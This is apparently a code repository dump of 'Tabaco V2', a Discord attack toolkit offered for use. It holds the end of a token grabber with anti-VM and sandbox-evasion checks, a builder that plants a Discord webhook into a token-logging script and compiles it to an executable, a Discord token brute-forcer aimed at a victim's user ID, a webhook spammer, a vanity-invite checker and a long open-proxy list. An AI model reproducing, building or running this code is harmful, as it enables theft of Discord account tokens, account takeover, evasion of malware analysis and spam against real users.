"4C4C4544-0050-3710-8058-CAC04F59344A", "00000000-0000-0000-0000-AC1F6BD04972", "79AF5279-16CF-4094-9758-F88A616D81B4", 728 | "5BD24D56-789F-8468-7CDC-CAA7222CC121", "49434D53-0200-9065-2500-65902500E439", "49434D53-0200-9036-2500-36902500F022", 729 | "777D84B3-88D1-451C-93E4-D235177420A7", "49434D53-0200-9036-2500-369025000C65", "B1112042-52E8-E25B-3655-6A4F54155DBF", 730 | "00000000-0000-0000-0000-AC1F6BD048FE", "EB16924B-FB6D-4FA1-8666-17B91F62FB37", "A15A930C-8251-9645-AF63-E45AD728C20C", 731 | "67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3", "C7D23342-A5D4-68A1-59AC-CF40F735B363", "63203342-0EB0-AA1A-4DF5-3FB37DBB0670", 732 | "44B94D56-65AB-DC02-86A0-98143A7423BF", "6608003F-ECE4-494E-B07E-1C4615D1D93C", "D9142042-8F51-5EFF-D5F8-EE9AE3D1602A", 733 | "49434D53-0200-9036-2500-369025003AF0", "8B4E8278-525C-7343-B825-280AEBCD3BCB", "4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27", 734 | ] 735 | 736 | for func in [self.listCheck, self.registryCheck, self.specsCheck]: 737 | process = threading.Thread(target=func, daemon=True) 738 | self.processes.append(process) 739 | process.start() 740 | for t in self.processes: 741 | try: 742 | t.join() 743 | except RuntimeError: 744 | continue 745 | 746 | def programExit(self): 747 | self.__class__.inVM = True 748 | 749 | def listCheck(self): 750 | for path in [r'D:\Tools', r'D:\OS2', r'D:\NT3X']: 751 | if ntpath.exists(path): 752 | self.programExit() 753 | 754 | for user in self.blackListedUsers: 755 | if Victim == user: 756 | self.programExit() 757 | 758 | for pcName in self.blackListedPCNames: 759 | if Victim_pc == pcName: 760 | self.programExit() 761 | 762 | for hwid in self.blackListedHWIDS: 763 | if self.system_info()[0] == hwid: 764 | self.programExit() 765 | 766 | def specsCheck(self): 767 | # would not recommend changing this to over 2gb since some actually have 3gb of ram 768 | if int(ram) <= 2: # 2gb or less ram 769 | self.programExit() 770 | if int(disk) <= 50: # 50gb or less disc space 771 | self.programExit() 772 | if int(psutil.cpu_count()) <= 1: # 1 or less cpu cores 773 | self.programExit() 774 | 775 | def registryCheck(self): 776 | reg1 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul") 777 | reg2 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul") 778 | if (reg1 and reg2) != 1: 779 | self.programExit() 780 | 781 | handle = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum') 782 | try: 783 | reg_val = winreg.QueryValueEx(handle, '0')[0] 784 | if ("VMware" or "VBOX") in reg_val: 785 | self.programExit() 786 | finally: 787 | winreg.CloseKey(handle) 788 | 789 | 790 | if __name__ == "__main__" and os.name == "nt": 791 | try: 792 | httpx.get('https://google.com') 793 | except (httpx.NetworkError, httpx.TimeoutException): 794 | os._exit(0) 795 | asyncio.run(HazardTokenGrabberV2().init()) 796 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/TokenLogger.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | webhook = input("Enter your Discord webhook: ") 4 | 5 | with open("Tools/TokenLog.py", "r+") as f: 6 | contents = f.readlines() 7 | contents[33] = f' "webhook": "{webhook}",\n' 8 | f.seek(0) 9 | f.writelines(contents) 10 | 11 | build_exe = input("Do you want to build an executable (Y/N)? ") 12 | if build_exe.lower() == "y": 13 | os.chdir("Tools") 14 | os.system("BuildExe.bat") 15 | elif build_exe.lower() == "n": 16 | print("OK, have fun!") 17 | else: 18 | print("Invalid input. OK, have fun!") 19 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/TokenbruteForce.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import threading 3 | import random 4 | import string 5 | import requests 6 | import time 7 | import colorama 8 | from colorama import Fore 9 | colorama.init() 10 | 11 | 12 | 13 | print(F"{Fore.RED} █████╗ ██╗ ██╗██╗ ██╗") 14 | print(F"{Fore.LIGHTBLUE_EX}██╔══██╗╚██╗██╔╝╚██╗ ██╔╝") 15 | time.sleep(0.1) 16 | print(F"{Fore.RED}███████║ ╚███╔╝ ╚████╔╝ ") 17 | time.sleep(0.1) 18 | print(F"{Fore.LIGHTBLUE_EX}██╔══██║ ██╔██╗ ╚██╔╝ ") 19 | time.sleep(0.1) 20 | print(F"{Fore.RED}██║ ██║██╔╝ ██╗ ██║ ") 21 | time.sleep(0.1) 22 | print(F"{Fore.LIGHTBLUE_EX}╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ") 23 | print(F"{Fore.RED}Made by MFSshadow!") 24 | time.sleep(2) 25 | 26 | idtoken = base64.b64encode((input("Victoms ID ---> ")).encode("ascii")) 27 | idtoken = str(idtoken)[2:-1] 28 | thrd = input("Threads ---> ") 29 | 30 | def bruhmoment(): 31 | while idtoken == idtoken: 32 | token = idtoken + '.' + ('').join(random.choices(string.ascii_letters + string.digits, k=4)) + '.' + ('').join(random.choices(string.ascii_letters + string.digits, k=25)) 33 | header={ 34 | 'Authorization': token 35 | } 36 | bruh = requests.get('https://discordapp.com/api/v9/auth/login', headers=header) 37 | 38 | if bruh.status_code == 200: 39 | print(F"{Fore.GREEN}[!] VALID" + ' ' + token) 40 | print(" ") 41 | file = open('hits.txt', "a+") 42 | file.write(F'{token}\n') 43 | else: 44 | print(F"{Fore.RED}[!] INVALID" + ' ' + token) 45 | print(" ") 46 | 47 | threads = [] 48 | 49 | for _ in range(int(thrd)): 50 | t = threading.Thread(target=bruhmoment) 51 | t.start() 52 | threads.append(t) 53 | 54 | for thread in threads: 55 | thread.join() 56 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/Vanity Checker.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os 3 | import threading 4 | from colorama import Fore 5 | import time 6 | r1 = Fore.RED 7 | g = Fore.GREEN 8 | 9 | 10 | Codes = open('Tools/Vanitys.txt', 'r').read().split('\n') 11 | proxies = open('Tools/proxies.txt', 'r').read().split('\n') 12 | available = open('Tools/Available.txt', 'w') 13 | 14 | def vanity(): 15 | for x in Codes: 16 | r = requests.get(f'https://discord.com/api/v9/invites/{x}',proxies={'http' : 'http://' + 'proxy'}) 17 | if r.status_code == 200: 18 | print(f'{r1}Vanity Taken | {x}') 19 | if r.status_code == 404: 20 | print(f'{g}Vanity Available | {x}') 21 | available.write(f'{x}\n') 22 | 23 | thread = threading.Thread(target=vanity) 24 | thread.start() -------------------------------------------------------------------------------- /Tabaco V2/Tools/Vanitys.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GoobGub/Tabaco-V2/3750d41ef816c28190db023dc47b9d581f4eab50/Tabaco V2/Tools/Vanitys.txt -------------------------------------------------------------------------------- /Tabaco V2/Tools/WORKED TOKENS.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GoobGub/Tabaco-V2/3750d41ef816c28190db023dc47b9d581f4eab50/Tabaco V2/Tools/WORKED TOKENS.txt -------------------------------------------------------------------------------- /Tabaco V2/Tools/WebhookSpam.py: -------------------------------------------------------------------------------- 1 | import time 2 | import requests 3 | msg = input("Please Insert webhook Spam Message: ") 4 | webhook = input("Please Insert webhook URL: ") 5 | def spam(msg, webhook): 6 | for i in range(30): 7 | try: 8 | data = requests.post(webhook, json={'content': msg}) 9 | if data.status_code == 204: 10 | print(f"Sent MSG {msg}") 11 | except: 12 | print("Bad Webhook :" + webhook) 13 | time.sleep(5) 14 | exit() 15 | counts = 1 16 | while counts == 1: 17 | spam(msg, webhook) 18 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/proxies.txt: -------------------------------------------------------------------------------- 1 | 80.154.203.122:8080 2 | 87.229.251.14:8081 3 | 154.16.63.16:3128 4 | 194.233.69.41:443 5 | 125.62.213.30:8000 6 | 005.252.161.48:8080 7 | 178.141.249.246:8081 8 | 191.96.42.80:8080 9 | 194.233.67.98:443 10 | 144.91.86.144:3128 11 | 64.124.38.140:8080 12 | 51.38.95.10:3128 13 | 54.237.111.226:3128 14 | 77.73.241.154:80 15 | 41.59.90.92:80 16 | 79.111.13.155:50625 17 | 87.238.209.26:8080 18 | 50.206.25.111:80 19 | 5.252.161.48:8080 20 | 194.150.255.142:80 21 | 222.74.202.233:9999 22 | 182.79.103.122:80 23 | 80.244.230.86:8080 24 | 68.183.89.13:80 25 | 152.67.204.155:80 26 | 46.237.255.2:8080 27 | 47.91.44.217:8000 28 | 209.97.150.167:3128 29 | 68.185.57.66:80 30 | 18.159.210.15:9300 31 | 39.106.223.134:80 32 | 181.10.117.254:999 33 | 12.69.91.226:80 34 | 18.141.168.2:80 35 | 95.216.194.46:1081 36 | 79.175.164.30:3128 37 | 89.108.137.83:8080 38 | 95.31.119.210:31135 39 | 47.74.152.29:8888 40 | 158.69.52.218:9300 41 | 103.56.208.250:8080 42 | 95.208.208.237:8080 43 | 185.211.193.162:8080 44 | 132.148.16.47:8080 45 | 82.223.102.92:9443 46 | 46.5.252.56:8080 47 | 125.99.100.193:40390 48 | 213.230.90.106:3128 49 | 104.248.48.172:31583 50 | 79.143.225.152:60517 51 | 111.3.116.43:30001 52 | 192.119.203.124:48678 53 | 46.223.255.11:8080 54 | 222.74.202.239:8080 55 | 181.129.248.122:999 56 | 46.237.255.13:3128 57 | 94.73.205.1:55443 58 | 165.227.33.90:8081 59 | 186.101.48.195:83 60 | 182.84.145.57:3256 61 | 64.225.49.147:80 62 | 200.85.169.18:47548 63 | 45.188.78.29:999 64 | 80.87.194.27:8118 65 | 139.99.75.11:8080 66 | 213.230.97.169:3128 67 | 222.74.202.238:80 68 | 95.0.94.170:80 69 | 94.23.91.209:80 70 | 121.230.210.136:3256 71 | 180.97.87.63:80 72 | 183.247.199.126:30001 73 | 3.217.181.204:80 74 | 217.60.194.47:8080 75 | 165.227.163.91:3128 76 | 95.171.5.144:1256 77 | 39.108.88.42:80 78 | 168.138.14.176:80 79 | 46.4.96.137:8080 80 | 189.240.60.169:8080 81 | 116.203.155.45:8118 82 | 188.165.226.99:80 83 | 200.233.148.140:3128 84 | 41.222.209.9:808 85 | 149.172.255.7:8080 86 | 188.166.162.1:3128 87 | 217.8.51.203:8080 88 | 91.89.89.2:8080 89 | 102.129.249.120:3128 90 | 190.217.10.12:999 91 | 189.240.60.168:8080 92 | 190.71.97.106:999 93 | 190.210.8.69:8080 94 | 150.107.137.25:8080 95 | 116.68.170.190:8080 96 | 89.222.182.144:3128 97 | 27.191.60.198:3256 98 | 80.249.135.241:8080 99 | 116.202.228.164:3128 100 | 47.242.230.146:8888 101 | 176.235.83.112:8080 102 | 212.175.55.46:53281 103 | 64.124.38.141:8080 104 | 158.69.73.79:9300 105 | 139.224.49.207:8118 106 | 192.99.2.41:3128 107 | 91.217.42.2:8080 108 | 189.195.41.242:8080 109 | 1.10.141.220:54620 110 | 74.113.137.156:3128 111 | 101.132.189.87:9090 112 | 117.35.253.179:3000 113 | 167.71.5.83:8080 114 | 185.111.164.65:8080 115 | 185.58.17.4:8080 116 | 190.152.182.150:55443 117 | 118.117.188.174:3256 118 | 206.81.2.180:3128 119 | 92.252.190.126:8080 120 | 90.102.20.197:82 121 | 118.179.144.62:8080 122 | 191.102.251.133:8085 123 | 182.84.144.225:3256 124 | 110.74.203.250:8080 125 | 161.117.225.201:80 126 | 18.168.64.243:80 127 | 45.231.223.250:999 128 | 177.244.36.134:8080 129 | 146.59.199.43:80 130 | 95.221.53.227:8080 131 | 47.252.31.217:1088 132 | 176.9.119.170:3128 133 | 181.224.162.198:999 134 | 216.113.27.151:80 135 | 193.34.132.77:80 136 | 2.188.166.25:3128 137 | 182.253.244.139:80 138 | 89.218.5.110:37717 139 | 94.23.170.46:43567 140 | 188.0.138.11:8080 141 | 103.85.150.106:8080 142 | 222.74.202.242:8081 143 | 176.98.76.203:42991 144 | 103.35.132.189:82 145 | 186.67.67.10:8080 146 | 156.54.212.62:3128 147 | 95.154.104.147:44393 148 | 65.21.123.198:3128 149 | 88.198.50.103:3128 150 | 204.199.84.226:8090 151 | 158.69.53.98:9300 152 | 222.74.202.233:82 153 | 194.242.98.33:3128 154 | 103.109.59.242:53281 155 | 45.172.111.13:999 156 | 200.116.226.210:43049 157 | 8.208.103.213:1088 158 | 46.237.255.14:8080 159 | 218.7.171.91:3128 160 | 203.113.167.3:80 161 | 103.248.93.5:8080 162 | 158.177.253.24:80 163 | 52.74.18.115:80 164 | 143.255.52.102:31158 165 | 82.212.62.29:8080 166 | 222.74.202.240:80 167 | 82.212.62.18:3128 168 | 23.94.143.167:80 169 | 103.6.184.222:39241 170 | 177.67.155.182:3128 171 | 176.236.223.151:9090 172 | 95.0.206.19:8080 173 | 12.218.209.130:53281 174 | 118.117.188.141:3256 175 | 43.224.8.14:6666 176 | 186.86.247.169:39168 177 | 36.91.107.61:8080 178 | 103.240.168.138:6666 179 | 190.217.1.53:32192 180 | 92.50.155.218:8080 181 | 121.100.19.69:8080 182 | 93.183.214.121:8080 183 | 198.20.116.74:8080 184 | 193.226.199.106:9090 185 | 84.54.82.173:3128 186 | 166.130.79.200:80 187 | 103.76.12.42:80 188 | 95.67.48.234:8080 189 | 183.247.152.98:53281 190 | 47.57.101.76:8118 191 | 50.246.120.125:8080 192 | 103.16.12.141:8080 193 | 190.217.14.110:999 194 | 190.111.203.179:8080 195 | 52.220.29.125:443 196 | 103.124.89.216:8080 197 | 116.12.236.210:8080 198 | 168.170.27.143:8080 199 | 194.228.129.189:55472 200 | 111.43.79.98:8085 201 | 78.42.42.44:3128 202 | 219.152.50.167:3128 203 | 47.88.22.73:3128 204 | 193.110.83.82:8080 205 | 14.238.99.105:3128 206 | 107.178.9.186:8080 207 | 45.195.76.130:999 208 | 36.92.79.238:8080 209 | 137.184.51.253:80 210 | 37.49.127.234:8080 211 | 203.135.25.179:8080 212 | 176.214.97.55:1256 213 | 43.255.113.232:8080 214 | 191.243.218.249:53281 215 | 201.222.44.34:999 216 | 115.84.246.50:80 217 | 222.74.202.244:80 218 | 45.181.190.9:8090 219 | 152.0.63.113:999 220 | 154.16.63.16:8080 221 | 185.203.118.237:8888 222 | 114.232.255.113:8118 223 | 50.206.25.106:80 224 | 78.42.42.36:8080 225 | 189.50.13.30:8080 226 | 36.67.8.27:53281 227 | 110.78.112.198:8080 228 | 23.238.33.186:80 229 | 149.172.255.13:3128 230 | 112.78.170.27:8080 231 | 190.210.8.90:8080 232 | 1.224.161.58:8081 233 | 85.216.127.179:3128 234 | 36.91.88.166:8080 235 | 192.162.192.148:55443 236 | 112.78.170.251:8080 237 | 200.24.157.120:999 238 | 181.48.220.250:999 239 | 179.27.201.136:80 240 | 124.158.88.56:54555 241 | 202.158.15.146:55667 242 | 181.209.105.157:8080 243 | 201.184.53.179:999 244 | 13.112.197.90:8080 245 | 27.191.60.148:3256 246 | 37.238.132.158:54190 247 | 36.91.194.25:8080 248 | 136.228.141.154:80 249 | 103.235.199.93:42033 250 | 104.149.140.174:443 251 | 177.86.201.22:8080 252 | 212.95.180.50:53281 253 | 64.124.38.138:8080 254 | 109.254.11.9:9090 255 | 103.10.22.234:8080 256 | 36.92.196.141:8080 257 | 116.1.7.243:3256 258 | 144.48.112.42:8080 259 | 200.73.208.62:999 260 | 51.79.165.93:8080 261 | 103.111.137.226:8085 262 | 94.75.76.10:8080 263 | 103.161.164.113:8181 264 | 24.113.42.177:48678 265 | 105.213.116.8:53281 266 | 161.97.127.234:3000 267 | 43.250.126.1:9001 268 | 8.243.120.54:999 269 | 188.170.234.58:33877 270 | 84.44.2.2:8080 271 | 69.160.192.139:8080 272 | 134.0.63.134:8000 273 | 103.255.242.115:8080 274 | 2.32.128.70:3128 275 | 110.44.124.220:55443 276 | 103.81.212.192:83 277 | 202.14.80.2:3128 278 | 79.101.98.2:53281 279 | 79.101.67.154:8080 280 | 195.34.241.124:8080 281 | 222.74.202.233:81 282 | 41.191.226.86:55443 283 | 103.142.21.197:8080 284 | 36.95.24.49:8080 285 | 80.249.135.25:8080 286 | 79.143.87.134:9090 287 | 94.247.241.70:53640 288 | 36.37.177.186:8080 289 | 185.110.210.5:8080 290 | 91.202.72.105:8080 291 | 52.227.7.173:80 292 | 179.127.174.58:8080 293 | 202.166.207.195:8080 294 | 115.127.162.234:8080 295 | 165.22.218.125:3128 296 | 45.179.200.161:999 297 | 134.3.255.4:8080 298 | 176.9.75.42:3128 299 | 103.14.196.13:83 300 | 178.172.225.49:3128 301 | 187.190.255.76:999 302 | 41.254.52.188:8080 303 | 36.94.229.237:8080 304 | 222.74.202.232:9999 305 | 188.235.136.203:8080 306 | 5.16.0.180:8080 307 | 131.196.14.232:999 308 | 45.64.11.241:8080 309 | 159.203.61.169:3128 310 | 77.99.232.24:80 311 | 182.75.97.166:3127 312 | 65.21.252.86:3128 313 | 185.58.18.1:8080 314 | 115.74.213.139:8080 315 | 43.128.18.61:8080 316 | 187.189.211.214:999 317 | 71.219.6.127:55443 318 | 157.52.151.11:80 319 | 92.119.159.21:3128 320 | 195.225.230.50:8080 321 | 20.81.62.32:3128 322 | 118.173.242.189:8080 323 | 194.233.69.38:443 324 | 188.133.143.135:1256 325 | 103.81.214.205:82 326 | 46.237.255.5:8080 327 | 43.255.113.232:8084 328 | 5.56.133.225:7890 329 | 200.55.3.125:999 330 | 58.209.234.8:3389 331 | 114.55.95.18:3128 332 | 79.143.87.140:9090 333 | 171.97.16.242:8080 334 | 116.12.236.212:8080 335 | 45.130.99.18:8080 336 | 194.111.185.23:80 337 | 181.13.3.170:999 338 | 117.102.81.6:53281 339 | 189.199.94.206:999 340 | 150.136.37.217:80 341 | 123.139.56.238:9999 342 | 207.244.227.169:443 343 | 3.125.229.175:80 344 | 43.231.160.77:10809 345 | 178.205.254.106:8080 346 | 222.74.202.242:80 347 | 122.248.45.35:53281 348 | 40.127.201.29:80 349 | 200.54.249.179:999 350 | 64.124.38.139:8080 351 | 158.69.66.131:9300 352 | 170.246.85.9:50991 353 | 88.99.155.226:3128 354 | 52.140.230.28:3128 355 | 119.82.239.37:8080 356 | 120.194.55.139:6969 357 | 182.253.82.154:37242 358 | 168.228.150.5:47507 359 | 45.189.86.138:8080 360 | 8.210.18.83:8000 361 | 58.251.94.56:6666 362 | 45.153.229.6:80 363 | 222.74.202.240:8081 364 | 209.91.184.156:80 365 | 88.255.234.198:80 366 | 115.110.207.120:3128 367 | 46.146.209.132:61309 368 | 191.252.194.87:80 369 | 194.44.15.222:8081 370 | 217.182.13.57:3128 371 | 36.89.99.98:44030 372 | 1.179.183.73:50178 373 | 103.106.112.18:1234 374 | 119.3.36.232:3128 375 | 150.129.148.88:35101 376 | 185.23.128.181:3128 377 | 200.46.65.66:8080 378 | 136.228.141.154:8080 379 | 200.54.194.12:53281 380 | 190.116.36.133:8080 381 | 5.44.54.103:8080 382 | 27.42.168.46:55481 383 | 103.230.211.29:8080 384 | 05.252.161.48:8080 385 | 58.221.193.74:8888 386 | 187.188.16.14:999 387 | 182.84.144.235:3256 388 | 45.118.166.114:8080 389 | 14.192.150.210:3128 390 | 31.204.180.44:53281 391 | 191.241.48.132:3128 392 | 121.40.108.76:80 393 | 54.38.78.108:3128 394 | 82.114.93.210:8080 395 | 88.146.218.75:12222 396 | 45.150.190.61:8080 397 | 81.18.34.98:42535 398 | 36.67.158.49:65301 399 | 119.167.66.22:8081 400 | 148.247.225.81:808 401 | 91.194.239.122:8080 402 | 121.232.148.50:3256 403 | 124.6.129.129:80 404 | 114.32.84.229:80 405 | 138.121.113.182:999 406 | 204.16.1.169:82 407 | 51.159.24.172:3167 408 | 106.14.132.57:8089 409 | 89.24.76.185:32842 410 | 85.198.250.135:3128 411 | 114.134.188.124:55667 412 | 188.133.139.219:1256 413 | 45.228.77.247:999 414 | 181.205.22.170:7654 415 | 103.83.118.10:55443 416 | 118.185.38.153:35101 417 | 190.2.209.138:999 418 | 18.132.18.81:80 419 | 27.116.51.181:6666 420 | 186.148.191.226:999 421 | 217.8.51.198:8080 422 | 43.255.217.201:1337 423 | 1.179.144.41:8080 424 | 119.90.38.51:3129 425 | 91.89.89.4:8080 426 | 182.84.144.41:3256 427 | 176.235.131.229:9090 428 | 134.249.114.53:8080 429 | 118.117.188.17:3256 430 | 171.97.131.193:8080 431 | 58.215.201.98:56566 432 | 181.129.138.114:30838 433 | 209.97.129.0:3128 434 | 202.162.214.243:80 435 | 80.87.213.45:8080 436 | 181.129.183.19:53281 437 | 161.35.52.72:80 438 | 5.252.161.48:3128 439 | 187.216.90.46:53281 440 | 43.224.10.32:6666 441 | 42.117.2.104:3128 442 | 101.99.94.189:80 443 | 177.152.97.98:8083 444 | 193.242.151.43:8080 445 | 46.223.255.13:3128 446 | 87.117.97.73:8080 447 | 64.124.38.142:8080 448 | 113.96.219.105:4002 449 | 103.26.130.156:55443 450 | 37.18.100.185:8080 451 | 47.107.211.142:3228 452 | 104.45.128.122:80 453 | 219.152.171.72:16887 454 | 82.146.42.187:80 455 | 93.157.12.248:8080 456 | 124.106.224.5:8080 457 | 183.88.232.207:8080 458 | 47.243.177.149:80 459 | 111.23.16.250:3128 460 | 182.84.145.120:3256 461 | 91.77.162.117:8080 462 | 183.88.210.77:8080 463 | 194.233.74.68:8080 464 | 165.16.46.193:8080 465 | 152.169.106.145:8080 466 | 46.101.49.62:80 467 | 92.118.191.156:6667 468 | 221.125.138.189:8380 469 | 134.3.255.4:3128 470 | 1.116.123.226:808 471 | 183.129.141.57:888 472 | 222.94.35.89:9999 473 | 103.139.219.110:82 474 | 177.66.112.221:57945 475 | 47.107.211.177:3228 476 | 120.27.214.78:3128 477 | 201.59.214.82:8080 478 | 183.91.0.120:3128 479 | 221.125.138.189:8193 480 | 85.62.10.91:8080 481 | 14.141.146.99:80 482 | 218.86.87.171:31661 483 | 182.84.144.86:3256 484 | 122.15.131.65:57873 485 | 14.97.2.108:80 486 | 221.131.158.246:8888 487 | 201.71.2.160:999 488 | 1.186.40.177:54754 489 | 95.0.6.228:8080 490 | 182.84.145.21:3256 491 | 222.165.205.154:8089 492 | 109.232.106.236:49565 493 | 218.59.193.14:38640 494 | 91.209.11.132:80 495 | 91.121.154.159:80 496 | 82.156.171.147:3128 497 | 175.101.15.34:83 498 | 36.92.70.209:8080 499 | 213.6.28.93:8080 500 | 198.199.86.11:8080 501 | 213.74.253.190:9090 502 | 177.86.18.124:8080 503 | 82.99.217.18:8080 504 | 176.236.98.163:9090 505 | 62.33.207.202:3128 506 | 222.74.202.229:8081 507 | 222.74.202.242:9999 508 | 106.52.236.117:808 509 | 103.241.227.98:6666 510 | 202.152.51.44:8080 511 | 88.99.209.230:3128 512 | 78.47.104.35:3128 513 | 103.56.208.89:8080 514 | 36.92.180.240:8080 515 | 190.8.43.35:999 516 | 129.205.210.90:65205 517 | 202.21.38.138:80 518 | 43.225.23.131:80 519 | 105.112.134.209:8080 520 | 103.35.135.30:83 521 | 185.3.213.8:8080 522 | 35.206.150.95:3128 523 | 65.38.21.118:80 524 | 91.146.224.225:53281 525 | 131.161.60.1:8083 526 | 160.19.240.58:8080 527 | 202.69.38.82:8080 528 | 125.62.213.18:83 529 | 190.216.107.254:999 530 | 134.209.29.120:8080 531 | 103.78.170.10:83 532 | 36.94.8.23:8080 533 | 66.70.229.130:43567 534 | 47.119.168.135:8888 535 | 128.199.202.122:3128 536 | 222.74.202.231:8080 537 | 143.0.226.116:3128 538 | 83.167.203.174:50128 539 | 202.153.41.214:84 540 | 221.125.138.189:8197 541 | 179.189.226.186:8080 542 | 82.212.62.25:8080 543 | 132.226.23.217:8888 544 | 101.51.139.179:8080 545 | 181.209.97.77:999 546 | 125.99.120.166:40390 547 | 41.170.12.92:37444 548 | 37.157.165.115:8080 549 | 164.77.131.172:999 550 | 95.140.117.225:6666 551 | 190.121.157.142:999 552 | 45.225.95.163:999 553 | 120.29.242.237:3128 554 | 161.117.89.36:8888 555 | 185.104.252.10:9090 556 | 181.143.17.37:8080 557 | 43.255.113.232:80 558 | 36.66.171.243:8080 559 | 209.91.184.153:80 560 | 213.6.65.30:8080 561 | 222.74.202.233:80 562 | 212.22.169.22:8085 563 | 154.127.36.138:8080 564 | 102.129.249.120:8080 565 | 103.85.150.106:8000 566 | 72.47.152.224:55443 567 | 93.91.112.247:41258 568 | 46.223.255.6:3128 569 | 176.101.89.226:33470 570 | 189.240.60.171:8080 571 | 85.90.211.73:8080 572 | 190.103.86.254:8080 573 | 132.226.16.58:8000 574 | 196.1.95.117:80 575 | 77.237.73.48:3128 576 | 80.93.212.44:3155 577 | 170.238.10.194:999 578 | 109.193.195.5:8080 579 | 5.16.0.174:8080 580 | 203.112.76.193:8080 581 | 89.111.104.109:41258 582 | 47.112.162.202:3228 583 | 103.20.188.5:8181 584 | 27.191.60.185:3256 585 | 191.96.42.80:3128 586 | 82.165.252.82:80 587 | 187.44.1.41:8080 588 | 47.98.179.39:8080 589 | 41.204.87.90:8080 590 | 46.237.255.11:8080 591 | 188.133.153.161:1256 592 | 47.75.90.57:80 593 | 94.181.48.71:1256 594 | 159.65.171.69:80 595 | 50.206.25.104:80 596 | 181.115.67.3:999 597 | 36.94.23.154:9999 598 | 134.122.93.93:8080 599 | 20.86.232.217:80 600 | 45.156.31.19:9090 601 | 179.49.210.100:999 602 | 139.198.179.174:3128 603 | 101.200.49.180:8118 604 | 82.114.119.81:8080 605 | 43.224.10.27:6666 606 | 103.37.141.69:80 607 | 36.95.142.26:8080 608 | 182.23.79.162:39902 609 | 104.248.90.212:80 610 | 195.187.63.42:8080 611 | 182.23.54.146:58519 612 | 138.117.84.105:999 613 | 96.9.69.164:53281 614 | 36.95.27.209:80 615 | 203.202.246.34:8080 616 | 209.45.4.163:999 617 | 203.189.137.137:8080 618 | 180.183.229.249:8080 619 | 181.13.14.8:8081 620 | 212.56.218.42:8080 621 | 219.152.171.80:16887 622 | 182.160.124.26:8081 623 | 103.112.35.221:8080 624 | 128.199.202.122:8080 625 | 223.25.99.114:9999 626 | 177.91.96.44:6666 627 | 144.91.85.172:3128 628 | 114.4.240.130:8080 629 | 181.176.161.39:999 630 | 118.97.47.249:55443 631 | 217.195.204.85:3161 632 | 182.253.0.44:808 633 | 41.73.5.190:80 634 | 190.5.94.74:999 635 | 109.195.69.211:8090 636 | 103.240.77.98:30093 637 | 59.37.18.243:3128 638 | 41.86.251.62:8080 639 | 79.174.12.173:3128 640 | 89.109.252.129:8080 641 | 200.24.135.59:999 642 | 182.23.211.108:80 643 | 65.182.5.212:8080 644 | 181.209.97.75:999 645 | 49.145.121.30:8080 646 | 134.209.29.120:3128 647 | 37.18.25.63:8080 648 | 94.16.15.100:3128 649 | 182.253.82.155:37242 650 | 182.84.145.204:3256 651 | 46.4.96.137:3128 652 | 5.189.184.6:80 653 | 139.60.226.225:8080 654 | 36.91.45.10:51672 655 | 202.164.152.229:8080 656 | 122.154.69.17:8082 657 | 193.34.95.110:8080 658 | 201.132.105.30:8080 659 | 78.42.42.39:3128 660 | 103.213.213.14:83 661 | 41.90.245.23:8080 662 | 91.143.218.146:3128 663 | 190.122.185.170:999 664 | 170.238.10.129:999 665 | 202.150.158.170:8080 666 | 37.26.136.181:52271 667 | 1.186.45.170:80 668 | 206.189.146.13:8080 669 | 192.99.239.215:8080 670 | 121.8.146.99:8060 671 | 189.45.199.37:20183 672 | 94.76.137.2:8080 673 | 94.143.48.145:8080 674 | 103.80.83.153:8080 675 | 62.201.217.194:8080 676 | 190.183.246.27:8080 677 | 160.16.104.81:3128 678 | 109.200.155.194:8080 679 | 47.90.132.228:3128 680 | 47.242.200.148:80 681 | 88.198.24.108:3128 682 | 103.139.242.181:83 683 | 91.149.203.12:3128 684 | 113.20.31.24:80 685 | 178.212.196.177:9999 686 | 182.79.103.125:80 687 | 45.229.32.244:999 688 | 82.99.232.18:58689 689 | 61.145.212.31:3128 690 | 158.69.64.142:9300 691 | 50.235.149.74:8080 692 | 177.37.16.104:8080 693 | 45.181.207.1:8080 694 | 47.100.231.6:3128 695 | 91.93.73.231:7070 696 | 203.236.203.208:80 697 | 196.214.185.87:80 698 | 190.211.81.210:3128 699 | 103.100.96.174:55443 700 | 223.99.2.59:63000 701 | 193.14.162.9:80 702 | 78.81.245.153:8080 703 | 203.110.240.156:80 704 | 81.71.122.208:3000 705 | 38.123.207.249:999 706 | 221.5.80.66:3128 707 | 43.224.10.37:6666 708 | 58.56.149.198:53281 709 | 197.210.217.66:34808 710 | 209.45.3.99:999 711 | 182.253.181.10:8080 712 | 109.193.195.14:8080 713 | 46.98.99.128:8080 714 | 118.163.94.3:80 715 | 117.102.81.5:53281 716 | 195.225.48.113:58302 717 | 181.225.54.59:8080 718 | 175.101.18.225:83 719 | 94.101.73.39:8080 720 | 103.122.63.17:8080 721 | 163.172.157.7:80 722 | 95.174.102.131:53281 723 | 46.161.192.5:8080 724 | 185.61.152.137:8080 725 | 185.209.69.147:8080 726 | 202.29.237.212:3128 727 | 81.21.82.109:8080 728 | 182.84.144.207:3256 729 | 40.91.94.165:3128 730 | 121.232.148.215:3256 731 | 91.142.12.34:8081 732 | 159.89.221.73:3128 733 | 47.254.90.125:81 734 | 183.247.207.225:30001 735 | 46.5.252.55:8080 736 | 34.192.253.65:80 737 | 217.195.203.28:3130 738 | 114.110.21.121:50464 739 | 43.224.10.36:6666 740 | 141.101.196.159:3128 741 | 45.189.58.65:9090 742 | 201.220.112.98:999 743 | 91.217.42.3:8080 744 | 